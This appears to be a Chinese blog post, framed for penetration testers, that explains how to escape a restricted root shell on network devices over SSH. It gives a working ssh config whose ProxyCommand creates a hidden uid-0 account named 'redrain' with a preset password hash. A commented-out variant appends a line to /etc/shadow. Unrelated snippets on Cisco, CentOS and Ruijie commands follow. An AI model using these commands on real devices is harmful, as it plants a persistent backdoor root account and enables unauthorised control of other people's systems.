網路裝置中限制使用者命令互動的逃逸

2021-06-26 22:27:36 字數 1141 閱讀 6970

在實際滲透場景中,有很多網路裝置我們拿到了root許可權後ssh登陸發現有命令執行限制,這是因為ssh介面提供了乙個特殊的受限制的命令外殼程式,類似busybox的感覺,他可以允許root使用者對裝置進行配置處理,但是不允許進行命令互動,所以相當於我們拿到的只是乙個雞肋的root使用者,為了突破這種限制,我們有特別的姿勢

因為開放了ssh服務,所以我們可以使用scp,但是scp是無法建立目錄的,所以我們想到的第乙個辦法是到使用者目錄的.ssh下,上傳公鑰,然後登陸到系統無需密碼,事實證明可以成功登陸,但是登陸的使用者的shell預設還是在這個受限的外殼下,命令互動依舊不成功

那如何逃逸這種限制?比較好玩兒,

ssh給我們提供了乙個可以按照配置預期執行命令的功能,在

$home/.ssh/ config

中進行配置,我們可以達到這樣的效果

我們在配置檔案中預期執行新增乙個新的root使用者,uid為0且無限制執行命令,以此來逃逸網路裝置的限制問題

config內容如下:

1

2

3

4

5

6

7

host ztzsb          #隨便寫乙個host名稱

hostname ip          #填寫當前ip

user root     #填寫當前受限使用者

#proxycommand /bin/bash %h %p

proxycommand useradd -p `openssl passwd -1 -salt 'mujj' redrain` -u 0 -o -g root -g root -s /bin/bash -d /usr/bin/redrain redrain

#或者echo乙個到/etc/shadow

#proxycommand echo "redrain:$1$mujj$niovcywtuzr76qhvsju0v.:10000:0:99999:7:::" >> /etc/shadow

此時,當我們使用內建的slogin就會觸發這個配置

只需要scp吧這個配置檔案傳到我們剛才受限的使用者目錄的.ssh/下,登陸這個受限使用者後執行

slogin -n ztzsb

就會執行配置中的命令~

cisco網路裝置季度簡單巡檢命令

在不知道密碼或者忘記密碼情況下,使用串列埠線連線思科交換機console口 新建會話,協議選serial 再調整serial的設定,設定port具體埠和速率 根據實際情況 show version 檢視版本 show processes cpu e 0.00 檢視cpu利用率 show proces...

CentOS中為系統新增網路裝置

現這是乙個centos5.4的系統,沒有網路配置 ifconfig只能看到lo。root lee ifconfig lo link encap local loopback inet addr 127.0.0.1 mask 255.0.0.0 inet6 addr 1 128 scope host ...

網路裝置常用協議總結二 銳捷命令

vlan概念 vlan是虛擬區域網的簡稱,是指位於乙個或多個區域網的裝置經過配置能夠連線到同乙個通道中那樣進行通訊,而實際上它們分布在不同的區域網段中。vlan能把區域網內的裝置邏輯的而不是物理的劃分在乙個網段內,也就是在物理網路上延生出邏輯網路,消除了物理限制。為了在一條線路上區分不同的vlan資...